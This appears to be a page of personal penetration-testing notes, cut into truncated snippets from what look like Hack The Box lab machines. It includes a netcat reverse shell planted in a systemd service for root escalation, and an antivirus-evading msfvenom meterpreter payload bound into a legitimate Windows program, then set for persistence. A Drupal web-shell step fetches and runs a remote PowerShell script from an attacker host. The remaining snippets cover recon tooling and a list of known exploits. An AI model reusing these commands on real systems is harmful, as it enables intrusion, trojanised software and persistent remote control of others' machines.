Steinz Security

This can be done when you find system ctl is running as root. so we need to create my own service. that can be done by METHOD - I Create a file named test.sh in Target Machine rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9002 >/tmp/f   save it as test.sh → copy the file to /home/bhanu/test.sh chmod +x test.sh    now create a new service: → save it as mys.service [Unit] Description=Example systemd service. [Service] Type=simple ExecStart=/bin/bash /home/bhanu/test.sh [Install] WantedBy=multi-user.target # Another set of Service - USE ONLY ONE SERVICE [Unit] Description=Example systemd service. [Service] Type=simple ExecStart=/bin/bash -p -c "id > /tmp/output" [Install] WantedBy=multi-user.target #if you face any issues run below 2 commands sudo setenforce 0 sudo systemctl daemon-reload #not mandatory chmod 644 /home/bhanu/mys.service # Start the Service systemctl enable /home/bhanu/mys.service #Check stat...

Some times,we need a Self signed certificate. So, to create it we need the CA's website.cer file and CA's private key. lets download the ca certificate from the website  Import the certificate and save it Lets start creating a new certificate: Example from LaCasaDePapel rlwrap nc 10.10.10.131 6200 //gets a responsive shell scandir("/home/berin") file_get_contents("/home/nairobi/ca.key") Lets vertify the private key we have matches the certificate we have. openssl pkey -in ca.key -pubout -----BEGIN PUBLIC KEY----- MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz3M6VN7OD5sHW+zCbIv/ 5vJpuaxJF3A5q2rVQJNqU1sFsbnaPxRbFgAtc8hVeMNii2nCFO8PGGs9P9pvoy8e 8DR9ksBQYyXqOZZ8/rsdxwfjYVgv+a3UbJNO4e9Sd3b8GL+4XIzzSi3EZbl7dlsO hl4+KB4cM4hNhE5B4K8UKe4wfKS/ekgyCRTRENVqqd3izZzz232yyzFvDGEOFJVz mhlHVypqsfS9rKUVESPHczaEQld3kupVrt/mBqwuKe99sluQzORqO1xMqbNgb55Z D66vQBSkN2PwBeiRPBRNXfnWla3Gkabukpu9xR9o+l7ut13...

ldapsearch -x -h 10.10.10.119   ldapsearch -x -h 10.10.10.119 -s base namingcontexts   ldapsearch -x -h 10.10.10.119 -b 'dc=lightweight,dc=htb'  extended LDIF # # LDAPv3 # base <dc=lightweight,dc=htb> with scope subtree # filter: (objectclass=*) # requesting: ALL # # lightweight.htb dn: dc=lightweight,dc=htb objectClass: top objectClass: dcObject objectClass: organization o: lightweight htb dc: lightweight # Manager, lightweight.htb dn: cn=Manager,dc=lightweight,dc=htb objectClass: organizationalRole cn: Manager description: Directory Manager # People, lightweight.htb dn: ou=People,dc=lightweight,dc=htb objectClass: organizationalUnit ou: People # Group, lightweight.htb dn: ou=Group,dc=lightweight,dc=htb objectClass: organizationalUnit ou: Group # ldapuser1, People, lightweight.htb dn: uid=ldapuser1,ou=People,dc=lightweight,dc=htb uid: ldapuser1 cn: ldapuser1 sn: ldapuser1 mail: ldapuser1@lightweight.htb objectClass: person objectClass: organizationalPe...

Basic Metasploit Commands msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=attacker_Ip -f exe -e x86/shikata_ga_nai -i 3 -b '\x00\xff' > /root/Desktop/encoded.exe shellter --> shellter is a dynamic shellcode injection tool, it can be used in order to inject shellcode into native windows applications downlaod any program to bind our payload download and open shellter in windows Select "A" select "N" drag the program to which our payload is to be binded select "stealth mode" y L 1 set attacker_ip set port 8080 -------------------------------- msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp show options set lport 8080 MAINTAINING PERSISTANT CONNECTION #get into a meterpreter connection first background use exploit/windows/local/persistence show options set EXE_NAME service1 set DELAY 10 sessions -i /show sessions set session 3 show advanced set EXE::CUSTOM /root/Desktop...

RustScan for High Speed Open Ports Detection https://github.com/RustScan/RustScan/releases download the debian package dpkg -i filename rustscan 10.10.10.10 rustscan 10.10.10.0/24 -p 80,443 --no-nmap or you can use masscan masscan --rate 15000 -oB myscan.mass 10.0.0.0/8 --ports 0-65535 Reconnoitre for service enum git clone https://github.com/codingo/Reconnoitre.git cd reconnoitre python setup.py install reconnoitre -t 10.10.10.10 --services -o new_recon Vanquish - Information Gathering git clone https://github.com/frizb/Vanquish.git cd Vanquish python2.7 Vanquish2.py -install echo 192.168.126.133 >> test.txt vanquish -hostFile test.txt -logging #read the output, located in hosts directory sn1per - Automated Enum git clone https://github.com/1N3/Sn1per cd Sn1per bash install.sh 1N3/Sn1per: Attack Surface Management Platform | Sn1perSecurity LLC (github.com) #NORMAL MODE + OSINT + RECON sniper -t <TARGET> -o -re sniper -t 10.10.10.10 -m vulnscan sniper -t 10.10.1...

apt-get install golang go run main.go       //most likely we will be missing few pacakges export GOPATH=/root/go               //Export go Path mkdir /root/go                             //make sure that path exists go get github.com/satori/go.uuid     //Downloading and installing packages in go go get golang.org/x/crypoto/ssh/terminakl       //Downloading and installing packages in go go run main.go go build     //compile a file -- creates an executable Installing go for Developers go to https://golang.org/dl/ and copy the link  - or you can refer to this link wget https://dl.google.com/go/go1.14.3.linux-amd64.tar.gz tar -xvf  go1.14.3.linux...

Linux 2.6.x -- > Priv Esc For Cent OS - 9595 dirty cow IIS 6.0 --> (229) 10791.py- File Extension Bypass   Windows Server 2000 --> SMB VULN MS08-067 Windows Server 2003 -- NT Authority Service to System Redis 4.x/5.x Unauth --> Packet Storm other Redis Exploitation Techniques: AGS BLOG Exploiting Redis 6379 Pen Testing VNC 4 --> Real VNC 4 - Auth Bypass Drupal Exploit --> Exploit-DB ; also find modified in /root/Downloads/exploits/drupal < 7.58 < 8.3.9 < 8.4.6 < 8.5.1 1) Run the exploit 2) go to website.com/bhanu.php?cmd=whoami 2.1) http://wensite.com/bhanu.php?cmd=echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.33:8001/rev.ps1') | powershell -noprofile - // Get Reverse Shell 3) a new session.json file is created 4) go to cookie manager plus --> add a new cookie from the earlier details and save it. go to website.com and see you are logged in as admin 5) OPTIONAL -- ...